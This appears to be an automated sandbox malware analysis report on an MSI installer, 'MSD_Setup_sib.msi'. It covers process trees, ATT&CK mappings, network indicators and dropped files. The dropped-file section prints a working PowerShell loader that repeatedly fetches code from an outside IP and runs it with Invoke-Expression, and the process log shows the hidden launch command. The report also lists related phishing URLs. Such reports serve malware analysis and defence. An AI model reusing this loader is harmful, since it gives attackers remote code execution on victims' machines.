Source: PING.EXE, 0000002C.00000002.2517238712.0000029951FCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start /min C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media
1
PowerShell
1
DLL Side-Loading
11
Process Injection
11
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System3
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)21
Virtualization/Sandbox Evasion
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets11
Peripheral Device Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
File Deletion
Cached Domain Credentials1
Remote System Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
System Network Configuration Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
File and Directory Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow12
System Information Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 1430483 Sample: MSD_Setup_sib.msi Startdate: 23/04/2024 Architecture: WINDOWS Score: 48 7 msiexec.exe 80 35 2->7         started        10 msiexec.exe 3 2->10         started        file3 30 C:\ProgramData\lgp\sjm, ASCII 7->30 dropped 12 cmd.exe 1 7->12         started        process4 signatures5 38 Suspicious powershell command line found 12->38 15 powershell.exe 22 22 12->15         started        19 conhost.exe 12->19         started        process6 dnsIp7 34 64.95.10.191, 49705, 49706, 49710 BRAHMAN-NYUS United States 15->34 36 Uses ping.exe to check the status of other devices and networks 15->36 21 PING.EXE 1 15->21         started        24 conhost.exe 15->24         started        26 conhost.exe 15->26         started        28 31 other processes 15->28 signatures8 process9 dnsIp10 32 1.1.1.1 CLOUDFLARENETUS Australia 21->32

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
MSD_Setup_sib.msi0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://64.95.10.191/36865753730%Avira URL Cloudsafe
http://64.95.10.191/0%Avira URL Cloudsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://64.95.10.191/3686575373false
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://64.95.10.191/sjm.2.drfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
1.1.1.1
unknownAustralia
13335CLOUDFLARENETUStrue
64.95.10.191
unknownUnited States
31982BRAHMAN-NYUSfalse
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1430483
Start date and time:2024-04-23 17:45:06 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 8m 4s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:45
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:MSD_Setup_sib.msi
Detection:MAL
Classification:mal48.troj.winMSI@112/25@0/2
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .msi
  • Override analysis time to 240s for powershell
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • VT rate limit hit for: MSD_Setup_sib.msi
TimeTypeDescription
17:46:00API Interceptor13844020x Sleep call for process: powershell.exe modified
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
1.1.1.1PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
  • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
  • 1.1.1.1/
INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
  • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
Go.exeGet hashmaliciousUnknownBrowse
  • 1.1.1.1/
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
CLOUDFLARENETUS_file____C__Users_hp_Downloads_C__Users_moodyt_AppData_Local_Temp_2_RemittanceAdvice17-Apr-2024.htmlGet hashmaliciousUnknownBrowse
  • 104.26.8.50
Remittance. #U0440df.htmlGet hashmaliciousHTMLPhisherBrowse
  • 104.17.208.58
http://geoguesser.com/seterra/en-an/vpg/3811?C=K44CTGet hashmaliciousUnknownBrowse
  • 172.67.188.149
TeaiGames.exeGet hashmaliciousNovaSentinelBrowse
  • 172.67.196.42
https://bitly.ws/3icqP?bUL=OnEzsOzmqRGet hashmaliciousUnknownBrowse
  • 172.67.183.48
http://geoguesser.com/seterra/en-an/vpg/3800Get hashmaliciousUnknownBrowse
  • 172.67.188.149
https://docs-paymentreceipts.infoGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
  • 104.17.2.184
https://go-g3t-msg.com/clk/a_OsB_gBHRWO62vTWAvzpOfGhlvCmgnqQuB_nVFpwp0KsQNH4MVSSKRIuzJYdR_BaVVJ5ZUVsLA7nr4fsUb6_LUiF6WGpw3bjwuz5vIgSMwTtrE34sfAdm_UkarEQxhut5pfRW1RXCEHttsR2H4S_hK5eTdM2QP7CpynnqXHAbBrQcsZM-9kqSh5d_nLiZhEZPZ8-fFHjtAo-IjMx8qNxpwUaG3dVXhIP_Sup8raijFjXrg2qZL33tH_5PvkpDXJwZtdK-fqRvdTEjPP1v26xG4zHKIduU5irbL6N1Be1W_4vpi6D3s8twjJ8VAELgUZErAiigzfRVU0knOdQpcprkwW48npT3pYYpFqQU_lE9JBwESVd70JOVQuZWj_0cT7YVVRRta1y8F8vjFBDtNL73BXlqjP5sWlGZtuOnQDJ-iEKMXGy1W4uSrGBn5j07qBR3I1glqsVkAz7msz4iUFsVZ76hS_yvRcDNZBMYnXgKJRgA1A2nVJ9rwv5a55G82GhCYmOQvkUs0eG7vFHjr8gNQtxUn0q5LeVhTPJbym_uRj-gxiLJDjsLnSJXJ4eGtDvxVqhkaqM2P03jYs6BzR_fyd4ak2ZNKBm4FiGWKP44e6keEO2eNlfhZPBYG9OMlI3UM7jaU5YayqoO3ZGet hashmaliciousUnknownBrowse
  • 1.1.1.1
CR-FEDEX_TN-775720741041.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
  • 172.67.74.152
https://main-bvxea6i-qhygy63sspp2a.ca-1.platformsh.site/sample-page/Get hashmaliciousHTMLPhisherBrowse
  • 172.67.142.234
BRAHMAN-NYUSz5BtaqcOWn.exeGet hashmaliciousUnknownBrowse
  • 64.95.10.243
https://assets-usa.mkt.dynamics.com/80915e83-72d1-ee11-9048-002248282c18/digitalassets/standaloneforms/5cda353e-6bd2-ee11-9079-000d3a99146aGet hashmaliciousUnknownBrowse
  • 64.95.10.68
https://assets-usa.mkt.dynamics.com/80915e83-72d1-ee11-9048-002248282c18/digitalassets/standaloneforms/5cda353e-6bd2-ee11-9079-000d3a99146aGet hashmaliciousUnknownBrowse
  • 64.95.10.68
No context
No context
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):9589
Entropy (8bit):5.59382704777507
Encrypted:false
SSDEEP:96:+Hc2apjdwGe6zN8LUF9CCsThqBLUF9CC6jeEOeIkThqhHRjpFMUw8NkclChC6pgz:+hapFe2lF9BIRF9BxEbTU0U6pHEt
MD5:6F74B6C02CB18BC9B449D6D290628E63
SHA1:F15E3592184C3EE9DFEAC0D9C18E16C3500731D0
SHA-256:25855850E76A5050B2405B4D2C911F6B29BD17869A6B4CD4E275EAE2622DABAB
SHA-512:0193DFD542535FAB30C9AAF2295E954D4D399A3C6EEC4335043BA9594B6B4D38C0EA76CB62DE2F226A02733A2070E385E544F8D9FF4CA5FC31138A7FC6F9EC2E
Malicious:false
Preview:...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{5388A5D6-8B37-4242-B64C-4D72F236B407}..MSD Setup..MSD_Setup_sib.msi.@.....@.....@.....@........&.{D59C64C0-985A-437E-9F88-C578DBDDC731}.....@.....@.....@.....@.......@.....@.....@.......@......MSD Setup......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{5388A5D6-8B37-4242-B64C-4D728033EE88}&.{5388A5D6-8B37-4242-B64C-4D72F236B407}.@......&.{5388A5D6-8B37-4242-B64C-4D72F511202A}&.{5388A5D6-8B37-4242-B64C-4D72F236B407}.@......&.{5388A5D6-8B37-4242-B64C-4D7245AF011A}&.{5388A5D6-8B37-4242-B64C-4D72F236B407}.@......&.{5388A5D6-8B37-4242-B64C-4D7288057524}&.{5388A5D6-8B37-4242-B64C-4D72F236B407}.@......&.{5388A5D6-8B37-4242-B64C-4D7235B6147A}&.{5388A5D6-8B37-4242-B64C-4D72F236B407}.@........CreateFolders..Creating folders..Folder: [1]"...C:\ProgramData\.@.............. .......,.............................x.............................
Process:C:\Windows\System32\msiexec.exe
File Type:ASCII text
Category:dropped
Size (bytes):477
Entropy (8bit):5.046983694783584
Encrypted:false
SSDEEP:6:0xAu7yLH3zQEM302ANAqwssVeK4yZfUUuYaH9sXUrsVeUrK5Yl4DFJav/FMgi0Tn:0GugH3UEM36ARf9i1QXVed5BFPV0wA
MD5:ABC748D5FB1B867BB5F2645778D813B0
SHA1:CB7B4A28D8A9F29C2552EE439E4FAE66D2C44D17
SHA-256:5F5921A54F42F72CBC94976097D3FA905B3A28702F7DC47DAA64CA38091005A4
SHA-512:16E84A95E6E35732227B03B3BEDB61C664FFE9F5B3B668BAD36BA1A04430D4AE67F20002FD4EFF1F4D7597246F9B6BFD8D73D7CC9962100F4365E326AAD04250
Malicious:true
Preview:.$fso = New-Object -Com "Scripting.FileSystemObject".$SerialNumber = $fso.GetDrive("c:\").SerialNumber.$SerialNumber = "{0:X}" -f $SerialNumber.$SerialNumber = [convert]::toint64($SerialNumber,16)..$serial = $SerialNumber.$ip = 'http://64.95.10.191/'.$url = $ip+$serial..$s = New-Object System.Net.WebClient.while ($true) {. ping 1.1.1.1..ping 1.1.1.1. try {. $result=$s.DownloadString($url). }. catch {. continue. }. Invoke-Expression $result.}
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:modified
Size (bytes):11608
Entropy (8bit):4.887486353364779
Encrypted:false
SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdzVFn3eGOVpN6K3bkkjo5LgkjDt4iWN3yBGHB9sT:lVib49PVoGIpN6KQkj2kkjh4iUx4cYK6
MD5:E3CC2E628C73E9D29D58817DFC1ADCC5
SHA1:3720336F2BCB67ADACD9FED9645AC3FFDC67928D
SHA-256:6C52B5B7085CA1A5EB18B7C7FF740BEC18D0911CCF7B321B4668EF725A912F3B
SHA-512:6C5DC96D036DD24BE29720F1568EE70DB069EE5F3F91D59289A9E597C699D4BEBEBA5525B43B3BC7EAE3D467211C6826137FEF1A57E42593DB6E308A2237EE32
Malicious:false
Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
